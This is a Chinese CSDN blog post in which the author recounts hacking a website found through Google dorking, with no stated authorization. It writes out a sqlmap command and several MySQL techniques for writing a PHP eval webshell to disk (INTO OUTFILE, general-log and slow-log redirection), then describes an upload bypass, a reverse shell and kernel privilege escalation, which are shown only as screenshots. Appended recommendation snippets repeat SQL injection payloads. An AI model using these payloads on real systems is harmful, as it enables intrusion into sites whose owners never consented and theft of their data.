崎岖的渗透测试

最新推荐文章于 2023-06-22 11:31:52 发布
最新推荐文章于 2023-06-22 11:31:52 发布
阅读量732 收藏
点赞数
分类专栏: 渗透测试 安全 linux 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hklearner/article/details/125252160
版权
安全 同时被 3 个专栏收录
20 篇文章 2 订阅
订阅专栏
渗透测试
16 篇文章 2 订阅
订阅专栏
linux
3 篇文章 0 订阅
订阅专栏

title: 崎岖的渗透测试实战
tags:

  • 渗透实战
    abbrlink: 47189
    date: 2022-06-12 21:20:58

渗透测试实战

闲来无事,找找站点搞一搞。非常感谢我的大表哥提供的技术帮助和支持。

一波谷歌语法,发现该站点,手工测试,发现可能存在sql注入,抱着试试看的心态,直接丢sqlmap。

因为一直用的windows下的sqlmap2,导致误判dba权限

python2 sqlmap.py -u http://xxxx/PHP/a_content.php?id=61   --random-agent  --tamper=space2hash.py --threads 5 --batch

旧版本sqlmap
在这里插入图片描述

kali下的sqlmap
在这里插入图片描述

mysql写入webshell

顺便学习加复习一下,方便自己以后食用

  1. 通过outfile写入shell

    select '<?php @eval($_POST[1]);?>' into outfile '网站的绝对路径/shell.php';

  2. 将shell写入表中

    将shell插入一个表中
insert into tables values ('<?php @eval($_POST[1]);?>');
查询该数据表,将结果导出文件
select comment from sxss into outfile '网站的绝对路径/shell.php';

  3. 开启全局日志写入shell

    查看全局日志配置
show variables like '%general%';
开启全局配置
set global general_log = on;
将日志文件设置成服务器下的木马文件
set global general_log_file = 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';
然后执行sql语句,mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中
select '<?php @eval($_POST[1]);?>';

  4. 慢查询日志写入shell(高版本的mysql有默认不让导入导出)

    查看慢查询日志开启情况
show variables like '%slow_query_log%';
开启慢查询日志
set global slow_query_log=1;
修改日志文件存储的绝对路径
set global slow_query_log_file='网站的绝对路径/shell.php';
向日志文件中写入shell
select '<?php @eval($_POST[1]);?>' or sleep(11);

利用条件:

  • root权限

  • 网站的绝对路径且具有写入权限

信息收集

1.扫描一波web路径,发现存在phpadmin

在这里插入图片描述

2.sqlmap一把梭
在这里插入图片描述

3.md5解密
在这里插入图片描述

数据库getshell尝试

  • 登录phpadmin

https://raw.githubusercontent.com/16778738/picture/master/img/202206122202317.png

  • 翻一波之前的phpadmin getshell笔记

确认一下网站的绝对路径

1.into outfile导入木马

select @@basedir;

只有/usr/,试试默认路径/var/www/html,无果

select '<?php eval($_POST[cmd]);?>' into outfile 'web路径';

mysql高版本中secure_file_pirv会对读写进行限制

show global variables like '%secure%';

secure_file_priv为NULL时,表示限制Mysql不允许导入导出。

要想成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv ="" 即可。
在这里插入图片描述

2.利用Mysql日志文件

mysql5.0以上会创建日志文件

  1. general_log 指的是日志保存状态,ON代表开启 OFF代表关闭;

  2. general_log_file 指的是日志的保存路径。

    查看日志状态:

    show variables like '%general%';

    当开启general时,所执行的sql语句都会出现在log文件

    修改general_log_file的值,执行的sql语句就会对应生成,进而getshell。

    需要注意路径斜杠的方向

    set global general_log = 'on'
set global general_log_file = 'C:/phpStudy/www/hack.php'

    再次执行,getshell

    select '<?php eval($_POST[cmd]);?>'

在这里插入图片描述

无法访问
在这里插入图片描述

前端上传getshell

前端登录,通过sqlmap跑出的用户账号密码登录,发现两处上传,一处头像,一处身份证照片上传
在这里插入图片描述

尝试上传漏洞

burp一把梭
在这里插入图片描述
在这里插入图片描述

经过一波操作尝试,发现图片可以上传成功,但是无法正常访问,和我的大表哥交流得知可能存在路径权限访问限制。

柳暗花明又一村

还得是见多识广的表哥啊!!!!

上传的很多路径都在/PHP/这个路径中,于是做了一下目录递归扫描,发现该站存在路径遍历的问题。

递归一波web路径 ,又学习到了新知识!!!开森
在这里插入图片描述

访问一波/PHP/qa/目录

可以正常访问,意外的有上传
在这里插入图片描述
在这里插入图片描述

webshell

在这里插入图片描述

反弹shell,提权

在这里插入图片描述

CVE-2021-3493(提权内核漏洞)

自己提权失败,linux提权需要学习一波,先借用表哥的图贴上
在这里插入图片描述

webshell的快乐

No One Is Secure Everything Can Be Broken !

脚本实习生
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
标准复合测试函数(CF)+原文介绍+算例
09-02
这些函数通常分为几个类别,如单峰、多峰、分离、崎岖等,每种类型代表不同的难度级别,以测试算法在不同环境下的适应性。 粒子群优化(PSO)是一种基于群体智能的全局优化算法,灵感来源于鸟群觅食行为。在PSO算例...
遇事不决,一把哈——sqlmap
最新发布
weixin_58782362的博客
07-28 465
有些网站只能在手机访问,但是sqlmap默认的访问头是电脑头,有些网站就是看文件头的base64编码注入点,需要对参数进行编码,才能进行注入。sqlmap里有自带的过滤规则。在进行post注入的时候,可以在后面加*(其实可以在数据包每行后面都加上一个*),数据包的完整性。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4647
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap 基本使用
JURUO222的博客
08-06 560
原文 序 遇到SQL注入就sqlmap一把,有一说一,这个工具确实好用,不过还是要了解SQL注入原理,不然只能做个脚本小子,简单了解一下 https://www.cnblogs.com/Lee-404/p/12795193.html sqlmap使用 介绍之前,先简单了解一下sqlmap的参数,可以利用 sqlmap -h 查询,这里简单介绍几个常用的 -u URL -r 文件 –dbs 获取库名 -D 库名 –tables 获取表名 -T 表名 –columns 获取字段名 -C 字段名 –dump
sqli-labs通关详解
m0_52051132的博客
10-15 6874
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
hackme靶场(getshell)
weixin_65722679的博客
06-21 199
hackme靶场(getshell)
崎岖地面上移动机器人构型发展综述
02-14
崎岖地面上移动机器人构型发展综述,徐贺,谭大伟,本文从拓扑结构型式角度对国内外移动机器人进行概括与分类,并从沙地用机器人轮子、车体平衡机构、摇臂机构和转向机构概念设计和
崎岖山地环境履带机器人降维变系数控制方法研究.pdf
08-14
#资源达人分享计划#
PSO_TEST.zip_PSO_c++pso实现_pso 测试函数_pso测试
09-20
这些函数具有不同的特性,如单峰、多峰、平坦或崎岖的地形,用于全面评估PSO算法在处理不同问题上的性能。 4. **C++实现** 使用C++实现PSO算法可以充分利用其高效和面向对象的特性。代码可能包含了类定义,如`...
在sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3934
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
WEB漏洞攻防 -根据应用场景进行注入-POST注入、HTTP头部注入[HOST]、XFF注入
易编橙 · 终身成长社群,相遇已是上上签!
07-28 1097
前文我们提到形成漏洞的两个必要条件是参数和可控变量;判断SQL注入时,URL地址要符合什么条件?是有参数。 之前我们利用URL内包含的参数进行注入测试,是最简单的GET方式的注入;因为可控变量的参数直接在URL的表象可以看到,我们可以直接利用。 如果说站点不通过GET传参的方式传递数据,那么该如何进行注入呢?这就是接下来我们要说的 “XFF、HTTP头、Post、Cookie注入”的方式。 由此,我们也知道了,数据的传递是讲究传递方式的
mysql报错unknown option ‘--slow_query_log‘的解决过程
张老板的博客
08-06 2387
还需要设置 slow_query_log_file = ‘‘巴拉巴拉路径’’,或者说slow_query_log=on,5.7以下版本是slow_query_log=1,我通通修改了,还是不行,如下图:图中还有两个错误,我参考官网改过来了,也还是不行。然并卵,没解决问题啊!...
CTFSHOW-sql注入
Yb_140的博客
08-13 2452
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
SQL注入写入一句话php(outfile方式)&中国菜刀连接
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 3651
通过SQL注入漏洞上传一句话木马前言一、先读取数据库路径二、写入一句话木马1.关闭windows系统防护三、上菜刀 前言 具体sql注入漏洞和一句话木马原理以及sql语句这里不做讲解,直接开门见山 以dvwa的low级别为例 一、先读取数据库路径 1' union select @@datadir,2# 二、写入一句话木马 1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/phpStudy/PHPTutorial
★SQL注入漏洞(2)注入方法2之into outfile注入
weixin_51339377的博客
03-18 852
into outfile/load_file name=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件 name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt 这个into outfile不具备创建文件的能力...
PHP -- SQL 注入讲解
tryheart的博客
12-02 1119
概念 SQL 注入漏洞,本质是语句的混淆,对用户输入的语句过滤不严,导致语句拼接成新的语句,达到注入的目的。 原理 参数用户可控:前端传给后端的参数内容是用户可控的。 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 注入点类型 数字型 select * from tables where id = 1; 字符型 select * from tables where id = '1'; 搜索型 select* from tables where id like '%1%'; 基于 u
sql注入
qq_47177909的博客
09-29 1765
简介 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 常识 ## 常用的注入闭合 语句 单引号 1' -- 数字 1 -- 双引号 1" -- 单引号+括号 1') -- 双引号加括号 1") -- 单引号+双括号+双引号 1'
ctfshow SQL注入Web175
m0_62584974的博客
05-01 892
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
六足机器人崎岖地形稳定性判定与恢复策略
"崎岖地形下六足机器人的失稳判定与调整.pdf" 这篇硕士学位论文主要探讨了在崎岖地形中六足机器人运动稳定性的问题。作者刘志江在导师罗欣教授的指导下,深入研究了如何在六足机器人在复杂地形行走时保持稳定并应对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值